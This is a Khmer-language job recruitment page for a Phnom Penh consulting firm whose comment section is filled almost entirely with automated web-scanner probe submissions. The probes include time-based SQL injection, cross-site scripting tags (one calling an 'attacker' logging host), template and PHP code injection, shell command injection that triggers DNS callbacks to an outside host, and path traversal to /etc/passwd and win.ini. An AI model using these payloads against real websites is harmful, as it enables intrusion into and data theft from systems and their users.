ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

តូក្យូ ខនសាល់ធីង ហ្វឺម

ក្រុមហ៊ុនពិគ្រោះយោបល់ TCF បានបង្កើតឡើងតាំងពីខែមេសាឆ្នាំ ២០១១ នៅទីក្រុងភ្នំពេញនៃប្រទេសកម្ពុជា ហើយជាសាខាមួយនៃក្រុមពិគ្រោះយោបល់ TCF ដែលត្រូវបានបង្កើតឡើងតាំងពីខែកក្កដាឆ្នាំ ១៩៩៨ ដោយលោក YASUNARI KUNO ។ ម៉្យាងវិញទៀត TCF បានចូលរួមផ្តល់សេវាកម្មដើម្បីពង្រឹងអាជីវកម្មរបស់អតិថិជន។ យើងជាអ្នកប្រឹក្សាយោបល់ជំនាញល្អបំផុត។ យើងផ្តល់ជូននូវការប្រកាសពន្ធ ការកត់ត្រារបាយការណ៍ហរិញ្ញវិត្ថុ ការប្រឹក្សាយោបល់អាជីវកម្ម និងសេវាកម្មជ្រើសរើសបុគ្គលិកនៅក្នុងប្រទេសកម្ពុជា។

ទំនាក់ទំនងដាក់ពាក្យតាមរយះលេខ៖ 017 379 343/ 078 943 939

ឬតាមរយះប្រអប់សារអេឡិចត្រូនិច Email: tcfcambodiahr@gmail.com 


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 65

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 24 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:54:45


  @@8N4cZ


 • pHqghUme

  2021-05-06 09:54:38


  1'"


 • pHqghUme

  2021-05-06 09:54:36


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:54:11


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:53:47


  UVhFqiDF')) OR 816=(SELECT 816 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:53:26


  bR6r3Gm8') OR 788=(SELECT 788 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:53:11


  QxiOGIsZ' OR 799=(SELECT 799 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:53


  -1)) OR 276=(SELECT 276 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:36


  -5) OR 327=(SELECT 327 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:19


  -5 OR 278=(SELECT 278 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:51:56


  JHpGwcPA'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:51:30


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:51:10


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:50:51


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:50:27


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:50:05


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:49:46


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:49:31


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:49:14


  -1" OR 2+14-14-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:49:13


  -1' OR 2+144-144-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:49:13


  -1' OR 2+673-673-1=0+0+0+1 or 'RmRoOV29'='


 • pHqghUme

  2021-05-06 09:49:12


  -1 OR 2+989-989-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:49:11


  -1 OR 2+636-636-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:49:10


  9f4swkSc


 • pHqghUme

  2021-05-06 09:48:46


  1


 • pHqghUme

  2021-05-06 09:48:22


  1


 • @@zE1zq

  2021-05-06 09:48:02


  1


 • 1'"

  2021-05-06 09:47:58


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:47:57


  1


 • FHNl7rx5')) OR 433=(SELECT 433 FROM PG_SLEEP(15))--

  2021-05-06 09:47:35


  1


 • QjKFEfVR') OR 330=(SELECT 330 FROM PG_SLEEP(15))--

  2021-05-06 09:47:22


  1


 • rXzkaufj' OR 386=(SELECT 386 FROM PG_SLEEP(15))--

  2021-05-06 09:47:06


  1


 • fgnFZK6e'; waitfor delay '0:0:15' --

  2021-05-06 09:46:51


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:46:38


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:46:21


  1


 • pHqghUme

  2021-05-06 09:46:04


  1<Zcx8ZS<


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:45:59


  1


 • pHqghUme

  2021-05-06 09:45:56


  1<img sRc='http://attacker-9471/log.php?


 • pHqghUme

  2021-05-06 09:45:51


  1<dLcHvI x=9613>


 • pHqghUme

  2021-05-06 09:45:47


  1<ifRAme sRc=9512.com></IfRamE>


 • pHqghUme

  2021-05-06 09:45:42


  1<W2Y0ER>HOHM3[!+!]</W2Y0ER>


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:45:41


  1


 • pHqghUme

  2021-05-06 09:45:33


  1VOawk <ScRiPt >iZFf(9486)</ScRiPt>


 • pHqghUme

  2021-05-06 09:45:26


  1<% contenteditable onresize=iZFf(9263)>


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:45:26


  1


 • pHqghUme

  2021-05-06 09:45:21


  1}body{acu:Expre/**/SSion(iZFf(9383))}


 • pHqghUme

  2021-05-06 09:45:13


  <a HrEF=jaVaScRiPT:>


 • -1" OR 2+37-37-1=0+0+0+1 --

  2021-05-06 09:45:04


  1


 • -1' OR 2+905-905-1=0+0+0+1 or '37YqKUXd'='

  2021-05-06 09:45:02


  1


 • pHqghUme

  2021-05-06 09:45:02


  <a HrEF=http://xss.bxss.me></a>


 • -1' OR 2+222-222-1=0+0+0+1 --

  2021-05-06 09:45:01


  1


 • -1 OR 2+67-67-1=0+0+0+1

  2021-05-06 09:45:00


  1


 • -1 OR 2+889-889-1=0+0+0+1 --

  2021-05-06 09:44:59


  1


 • pHqghUme

  2021-05-06 09:44:56


  1<input autofocus onfocus=iZFf(9517)>


 • pHqghUme

  2021-05-06 09:44:47


  1&lt;ScRiPt&gt;iZFf(9627)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:44:38


  1\u003CScRiPt\iZFf(9872)\u003C/sCripT\u003E


 • Hst4vRDd

  2021-05-06 09:44:36


  1


 • pHqghUme

  2021-05-06 09:44:28


  %31%3C%53%63%52%69%50%74%20%3E%69%5A%46%66%289292%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:44:20


  1<img/src=">" onerror=alert(9045)>


 • pHqghUme

  2021-05-06 09:44:15


  1<img src=xyz OnErRor=iZFf(9537)>


 • pHqghUme

  2021-05-06 09:44:12


  1


 • pHqghUme

  2021-05-06 09:44:10


  1<img src=//xss.bxss.me/t/dot.gif onload=iZFf(9339)>


 • pHqghUme

  2021-05-06 09:44:05


  1<body onload=iZFf(9247)>


 • pHqghUme

  2021-05-06 09:43:58


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9255'>


 • pHqghUme

  2021-05-06 09:43:53


  1<isindex type=image src=1 onerror=iZFf(9194)>


 • pHqghUme

  2021-05-06 09:43:49


  1


 • pHqghUme

  2021-05-06 09:43:44


  1<ScRiPt >iZFf(9789)</ScRiPt>


 • pHqghUme

  2021-05-06 09:43:36


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9479></ScRiPt>


 • pHqghUme

  2021-05-06 09:43:32


  1<ScRiPt >iZFf(9937)</ScRiPt>


 • pHqghUme

  2021-05-06 09:43:27


  1


 • pHqghUme

  2021-05-06 09:43:27


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%69%5A%46%66%28%39%34%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:43:23


  1


 • pHqghUme

  2021-05-06 09:43:22


  1


 • pHqghUme

  2021-05-06 09:43:22


  1<script>iZFf(9908)</script>


 • pHqghUme

  2021-05-06 09:43:17


  1<WYSZE5>TT7A2[!+!]</WYSZE5>


 • pHqghUme

  2021-05-06 09:43:12


  1<ScRiPt >iZFf(9651)</ScRiPt>


 • pHqghUme

  2021-05-06 09:43:08


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:43:01


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:42:59


  1


 • pHqghUme

  2021-05-06 09:42:54


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:42:48


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:42:41


  1


 • pHqghUme

  2021-05-06 09:42:36


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:42:27


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:42:20


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:42:18


  1


 • pHqghUme

  2021-05-06 09:42:06


  acux7848%C0%BEz1%C0%BCz2a%90bcxuca7848


 • pHqghUme

  2021-05-06 09:41:57


  1


 • pHqghUme

  2021-05-06 09:41:56


  acu4457%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4457


 • pHqghUme

  2021-05-06 09:41:49


  19520944


 • pHqghUme

  2021-05-06 09:41:42


  '"()&%<acx><ScRiPt >iZFf(9807)</ScRiPt>


 • pHqghUme

  2021-05-06 09:41:41


  1


 • pHqghUme

  2021-05-06 09:41:35


  1'"()&%<acx><ScRiPt >iZFf(9604)</ScRiPt>


 • pHqghUme<LYKJY1<

  2021-05-06 09:41:25


  1


 • pHqghUme

  2021-05-06 09:41:23


  1


 • pHqghUme<img sRc='http://attacker-9259/log.php?

  2021-05-06 09:41:13


  1


 • pHqghUme<a1Pz3B x=9832>

  2021-05-06 09:41:05


  1


 • pHqghUme<ifRAme sRc=9631.com></IfRamE>

  2021-05-06 09:40:59


  1


 • pHqghUme

  2021-05-06 09:40:56


  1


 • pHqghUme<WGDJQG>5QOFC[!+!]</WGDJQG>

  2021-05-06 09:40:54


  1


 • pHqghUmerrUSj <ScRiPt >iZFf(9488)</ScRiPt>

  2021-05-06 09:40:46


  1


 • pHqghUme<% contenteditable onresize=iZFf(9465)>

  2021-05-06 09:40:38


  1


 • pHqghUme

  2021-05-06 09:40:34


  1


 • pHqghUme}body{acu:Expre/**/SSion(iZFf(9206))}

  2021-05-06 09:40:29


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:40:20


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:40:14


  1


 • pHqghUme

  2021-05-06 09:40:13


  1


 • pHqghUme<input autofocus onfocus=iZFf(9856)>

  2021-05-06 09:40:08


  1


 • pHqghUme&lt;ScRiPt&gt;iZFf(9885)&lt;/sCripT&gt;

  2021-05-06 09:40:01


  1


 • pHqghUme\u003CScRiPt\iZFf(9954)\u003C/sCripT\u003E

  2021-05-06 09:39:56


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%69%5A%46%66%289394%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:39:50


  1


 • pHqghUme

  2021-05-06 09:39:47


  1


 • pHqghUme

  2021-05-06 09:39:46


  1


 • pHqghUme<img/src=">" onerror=alert(9507)>

  2021-05-06 09:39:46


  1


 • pHqghUme

  2021-05-06 09:39:46


  1


 • pHqghUme

  2021-05-06 09:39:45


  1


 • pHqghUme

  2021-05-06 09:39:45


  1


 • pHqghUme

  2021-05-06 09:39:44


  1


 • pHqghUme<img src=xyz OnErRor=iZFf(9804)>

  2021-05-06 09:39:38


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=iZFf(9733)>

  2021-05-06 09:39:32


  1


 • pHqghUme

  2021-05-06 09:39:27


  1


 • pHqghUme<body onload=iZFf(9248)>

  2021-05-06 09:39:25


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9682'>

  2021-05-06 09:39:20


  1


 • pHqghUme<isindex type=image src=1 onerror=iZFf(9533)>

  2021-05-06 09:39:13


  1


 • pHqghUme

  2021-05-06 09:39:12


  1


 • pHqghUme<ScRiPt >iZFf(9357)</ScRiPt>

  2021-05-06 09:39:05


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9375></ScRiPt>

  2021-05-06 09:39:00


  1


 • pHqghUme

  2021-05-06 09:38:55


  1


 • pHqghUme<ScRiPt >iZFf(9266)</ScRiPt>

  2021-05-06 09:38:52


  1


 • pHqghUme

  2021-05-06 09:38:51


  1


 • pHqghUme

  2021-05-06 09:38:51


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%69%5A%46%66%28%39%37%37%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:38:47


  1


 • pHqghUme<script>iZFf(9974)</script>

  2021-05-06 09:38:40


  1


 • pHqghUme

  2021-05-06 09:38:37


  1


 • pHqghUme<WGUDV4>Q7THR[!+!]</WGUDV4>

  2021-05-06 09:38:35


  1


 • pHqghUme<ScRiPt >iZFf(9144)</ScRiPt>

  2021-05-06 09:38:30


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:38:24


  1


 • pHqghUme

  2021-05-06 09:38:21


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:38:16


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:38:11


  1


 • pHqghUme

  2021-05-06 09:38:09


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:38:06


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:37:59


  1


 • pHqghUme

  2021-05-06 09:37:54


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:37:44


  1


 • pHqghUme

  2021-05-06 09:37:38


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:37:37


  1


 • acux1146%C0%BEz1%C0%BCz2a%90bcxuca1146

  2021-05-06 09:37:30


  1


 • pHqghUme

  2021-05-06 09:37:22


  1


 • acu9891%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9891

  2021-05-06 09:37:21


  1


 • pHqghUme9558471

  2021-05-06 09:37:12


  1


 • '"()&%<acx><ScRiPt >iZFf(9763)</ScRiPt>

  2021-05-06 09:37:04


  1


 • pHqghUme

  2021-05-06 09:37:03


  1


 • pHqghUme'"()&%<acx><ScRiPt >iZFf(9327)</ScRiPt>

  2021-05-06 09:37:00


  1


 • pHqghUme

  2021-05-06 09:36:55


  1


 • pHqghUme

  2021-05-06 09:36:51


  1


 • pHqghUme

  2021-05-06 09:36:47


  1


 • pHqghUme

  2021-05-06 09:36:45


  1


 • pHqghUme

  2021-05-06 09:36:41


  1


 • pHqghUme

  2021-05-06 09:36:34


  1


 • pHqghUme

  2021-05-06 09:36:26


  1


 • pHqghUme

  2021-05-06 09:36:26


  1


 • pHqghUme

  2021-05-06 09:36:23


  <!--


 • <!--

  2021-05-06 09:36:22


  1


 • pHqghUme

  2021-05-06 09:36:22


  '"


 • pHqghUme

  2021-05-06 09:36:21


  1


 • '"

  2021-05-06 09:36:21


  1


 • pHqghUme

  2021-05-06 09:36:20


  1


 • pHqghUme

  2021-05-06 09:36:20


  1


 • pHqghUme

  2021-05-06 09:36:19


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 09:36:19


  1


 • pHqghUme

  2021-05-06 09:36:18


  '+'A'.concat(70-3).concat(22*4).concat(107).concat(79).concat(97).concat(87)+(require'socket' Socket.gethostbyname('hitkz'+'ygytmxdcf4bbb.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:36:18


  1


 • /xfs.bxss.me

  2021-05-06 09:36:18


  1


 • pHqghUme

  2021-05-06 09:36:17


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • '+'A'.concat(70-3).concat(22*4).concat(99).concat(68).concat(121).concat(90)+(require'socket' Socket.gethostbyname('hitbm'+'khbtpvpz95d7d.bxss.me.')[3].to_s)+'

  2021-05-06 09:36:17


  1


 • pHqghUme

  2021-05-06 09:36:17


  "+"A".concat(70-3).concat(22*4).concat(103).concat(75).concat(109).concat(78)+(require"socket" Socket.gethostbyname("hitmf"+"kbpgdtyea17bb.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:36:17


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:36:16


  1


 • pHqghUme

  2021-05-06 09:36:16


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:36:16


  1


 • pHqghUme

  2021-05-06 09:36:16


  '.print(md5(31337)).'


 • "+"A".concat(70-3).concat(22*4).concat(117).concat(76).concat(109).concat(82)+(require"socket" Socket.gethostbyname("hitxf"+"flruikji0a668.bxss.me.")[3].to_s)+"

  2021-05-06 09:36:16


  1


 • pHqghUme

  2021-05-06 09:36:15


  1


 • pHqghUme

  2021-05-06 09:36:15


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:36:15


  1


 • pHqghUme

  2021-05-06 09:36:15


  1


 • pHqghUme

  2021-05-06 09:36:15


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:36:15


  1


 • pHqghUme

  2021-05-06 09:36:14


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 09:36:14


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:36:14


  1


 • pHqghUme

  2021-05-06 09:36:13


  HttP://bxss.me/t/xss.html?%00


 • ${@print(md5(31337))}\

  2021-05-06 09:36:13


  1


 • pHqghUme

  2021-05-06 09:36:13


  bxss.me/t/xss.html?%00


 • '.print(md5(31337)).'

  2021-05-06 09:36:13


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:36:12


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:36:12


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:36:12


  1


 • ${@print(md5(31337))}

  2021-05-06 09:36:12


  1


 • pHqghUme

  2021-05-06 09:36:11


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:36:11


  1


 • pHqghUme

  2021-05-06 09:36:11


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:36:11


  1


 • pHqghUme

  2021-05-06 09:36:10


  1


 • pHqghUme

  2021-05-06 09:36:10


  1


 • pHqghUme

  2021-05-06 09:36:10


  1


 • pHqghUme

  2021-05-06 09:36:10


  1


 • pHqghUme

  2021-05-06 09:36:09


  1


 • pHqghUme

  2021-05-06 09:36:09


  1


 • pHqghUme

  2021-05-06 09:36:09


  1


 • pHqghUme

  2021-05-06 09:36:08


  1


 • pHqghUme

  2021-05-06 09:36:08


  1


 • pHqghUme

  2021-05-06 09:36:07


  1


 • pHqghUme

  2021-05-06 09:36:07


  1


 • pHqghUme

  2021-05-06 09:36:07


  '"()


 • pHqghUme

  2021-05-06 09:36:06


  1


 • pHqghUme

  2021-05-06 09:36:06


  1


 • pHqghUme

  2021-05-06 09:36:05


  1


 • '"()

  2021-05-06 09:36:03


  1


 • pHqghUme

  2021-05-06 09:36:00


  1


 • pHqghUme

  2021-05-06 09:36:00


  1&n910584=v965491


 • pHqghUme

  2021-05-06 09:35:59


  '.gethostbyname(lc('hitfp'.'wtiorhpd810f2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(108).chr(69).'


 • pHqghUme

  2021-05-06 09:35:59


  1


 • pHqghUme

  2021-05-06 09:35:59


  ".gethostbyname(lc("hitrc"."eydctvlx07c54.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(89).chr(117).chr(84)."


 • ".gethostbyname(lc("hitsg"."fvsjyeaje6694.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(78).chr(112).chr(84)."

  2021-05-06 09:35:58


  1


 • pHqghUme

  2021-05-06 09:35:58


  1


 • pHqghUme

  2021-05-06 09:35:57


  1


 • pHqghUme

  2021-05-06 09:35:57


  1


 • '.gethostbyname(lc('hited'.'kdywfwlmeeb5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(74).chr(111).chr(70).'

  2021-05-06 09:35:57


  1


 • pHqghUme

  2021-05-06 09:35:57


  1


 • pHqghUme

  2021-05-06 09:35:56


  1


 • pHqghUme

  2021-05-06 09:35:56


  1


 • pHqghUme

  2021-05-06 09:35:56


  1


 • pHqghUme

  2021-05-06 09:35:56


  1


 • pHqghUme

  2021-05-06 09:35:55


  1


 • pHqghUme

  2021-05-06 09:35:55


  1


 • pHqghUme&n954082=v907295

  2021-05-06 09:35:53


  1


 • pHqghUme

  2021-05-06 09:35:52


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:35:52


  bxss.me


 • pHqghUme

  2021-05-06 09:35:51


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:35:51


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 09:35:50


  1


 • pHqghUme

  2021-05-06 09:35:50


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:35:49


  1


 • pHqghUme

  2021-05-06 09:35:47


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 09:35:47


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:35:46


  1


 • pHqghUme

  2021-05-06 09:35:46


  !(()&&!|*|*|


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:35:46


  1


 • pHqghUme

  2021-05-06 09:35:45


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:35:45


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:35:45


  1


 • pHqghUme

  2021-05-06 09:35:45


  )


 • pHqghUme

  2021-05-06 09:35:44


  1


 • )

  2021-05-06 09:35:44


  1


 • pHqghUme

  2021-05-06 09:35:44


  1


 • !(()&&!|*|*|

  2021-05-06 09:35:44


  1


 • pHqghUme

  2021-05-06 09:35:43


  1


 • pHqghUme

  2021-05-06 09:35:43


  1


 • pHqghUme

  2021-05-06 09:35:43


  1


 • pHqghUme

  2021-05-06 09:35:43


  1


 • pHqghUme

  2021-05-06 09:35:42


  1


 • pHqghUme

  2021-05-06 09:35:42


  1


 • pHqghUme

  2021-05-06 09:35:42


  1


 • pHqghUme

  2021-05-06 09:35:42


  1


 • pHqghUme

  2021-05-06 09:35:41


  1


 • pHqghUme

  2021-05-06 09:35:41


  1


 • pHqghUme

  2021-05-06 09:35:41


  1


 • pHqghUme

  2021-05-06 09:35:41


  1


 • pHqghUme

  2021-05-06 09:35:40


  1


 • pHqghUme

  2021-05-06 09:35:38


  1


 • RVI0WEVRSmc=

  2021-05-06 09:35:37


  1


 • ${9999828+9999197}

  2021-05-06 09:35:35


  1


 • pHqghUme

  2021-05-06 09:35:35


  ${9999230+9999345}


 • pHqghUme

  2021-05-06 09:35:34


  1


 • pHqghUme

  2021-05-06 09:35:34


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:35:34


  1


 • pHqghUme

  2021-05-06 09:35:34


  1


 • pHqghUme

  2021-05-06 09:35:34


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 09:35:33


  1


 • pHqghUme

  2021-05-06 09:35:32


  `(nslookup hituygkihnilu1d582.bxss.me||perl -e "gethostbyname('hituygkihnilu1d582.bxss.me')")`


 • pHqghUme

  2021-05-06 09:35:31


  |(nslookup hitqiyknrkmeafe005.bxss.me||perl -e "gethostbyname('hitqiyknrkmeafe005.bxss.me')")


 • pHqghUme

  2021-05-06 09:35:28


  $(nslookup hityyvwczxhdnbe8f2.bxss.me||perl -e "gethostbyname('hityyvwczxhdnbe8f2.bxss.me')")


 • pHqghUme

  2021-05-06 09:35:27


  |echo rqrntg$()\ xnuyki\nz^xyu||a #' |echo rqrntg$()\ xnuyki\nz^xyu||a #|" |echo rqrntg$()\ xnuyki\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:35:27


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:35:27


  1


 • pHqghUme

  2021-05-06 09:35:27


  (nslookup hitjwdrluyttu47490.bxss.me||perl -e "gethostbyname('hitjwdrluyttu47490.bxss.me')")


 • pHqghUme

  2021-05-06 09:35:26


  echo wereco$()\ memhfm\nz^xyu||a #' &echo wereco$()\ memhfm\nz^xyu||a #|" &echo wereco$()\ memhfm\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:35:26


  &echo tdhbjj$()\ nnjxwp\nz^xyu||a #' &echo tdhbjj$()\ nnjxwp\nz^xyu||a #|" &echo tdhbjj$()\ nnjxwp\nz^xyu||a #


 • |(nslookup hitfssoxohihu84cd3.bxss.me||perl -e "gethostbyname('hitfssoxohihu84cd3.bxss.me')")

  2021-05-06 09:35:22


  1


 • `(nslookup hitptajmnzzzj62c10.bxss.me||perl -e "gethostbyname('hitptajmnzzzj62c10.bxss.me')")`

  2021-05-06 09:35:22


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:35:21


  1


 • |echo fyvrcf$()\ hqvfxs\nz^xyu||a #' |echo fyvrcf$()\ hqvfxs\nz^xyu||a #|" |echo fyvrcf$()\ hqvfxs\nz^xyu||a #

  2021-05-06 09:35:19


  1


 • (nslookup hitebivfefosna3ffe.bxss.me||perl -e "gethostbyname('hitebivfefosna3ffe.bxss.me')")

  2021-05-06 09:35:19


  1


 • $(nslookup hitbusdweksds90a2a.bxss.me||perl -e "gethostbyname('hitbusdweksds90a2a.bxss.me')")

  2021-05-06 09:35:19


  1


 • echo vwmxxk$()\ kobkba\nz^xyu||a #' &echo vwmxxk$()\ kobkba\nz^xyu||a #|" &echo vwmxxk$()\ kobkba\nz^xyu||a #

  2021-05-06 09:35:18


  1


 • &echo gfagfa$()\ mmfuib\nz^xyu||a #' &echo gfagfa$()\ mmfuib\nz^xyu||a #|" &echo gfagfa$()\ mmfuib\nz^xyu||a #

  2021-05-06 09:35:18


  1


 • pHqghUme

  2021-05-06 09:35:16


  1


 • pHqghUme

  2021-05-06 09:35:14


  1


 • pHqghUme

  2021-05-06 09:35:14


  1


 • pHqghUme

  2021-05-06 09:35:10


  1


 • pHqghUme

  2021-05-06 09:35:09


  1


 • pHqghUme

  2021-05-06 09:35:08


  1


 • pHqghUme

  2021-05-06 09:35:07


  1


 • pHqghUme

  2021-05-06 09:35:05


  1


 • pHqghUme

  2021-05-06 09:35:05


  1


 • pHqghUme

  2021-05-06 09:35:04


  1


 • pHqghUme

  2021-05-06 09:35:01


  1


 • pHqghUme

  2021-05-06 09:35:01


  ../1


 • pHqghUme

  2021-05-06 09:35:00


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:35:00


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:35:00


  1


 • pHqghUme

  2021-05-06 09:34:59


  1


 • ../pHqghUme

  2021-05-06 09:34:59


  1


 • pHqghUme

  2021-05-06 09:34:58


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:34:58


  1


 • pHqghUme

  2021-05-06 09:34:57


  1


 • pHqghUme

  2021-05-06 09:34:57


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:34:57


  1


 • pHqghUme

  2021-05-06 09:34:56


  1


 • pHqghUme

  2021-05-06 09:34:56


  1


 • pHqghUme

  2021-05-06 09:34:55


  1


 • pHqghUme

  2021-05-06 09:34:55


  1


 • pHqghUme

  2021-05-06 09:34:54


  1


 • pHqghUme

  2021-05-06 09:34:54


  1


 • pHqghUme

  2021-05-06 09:34:54


  1


 • pHqghUme

  2021-05-06 09:34:53


  1


 • pHqghUme

  2021-05-06 09:34:53


  1


 • pHqghUme

  2021-05-06 09:34:53


  1


 • pHqghUme

  2021-05-06 09:34:53


  1


 • pHqghUme

  2021-05-06 09:34:52


  1


 • pHqghUme

  2021-05-06 09:34:52


  1


 • pHqghUme

  2021-05-06 09:34:50


  1


 • jEzg8I0u

  2021-05-06 09:34:48


  1


 • pHqghUme

  2021-05-06 09:34:48


  72nm01vW


 • pHqghUme

  2021-05-06 09:34:47


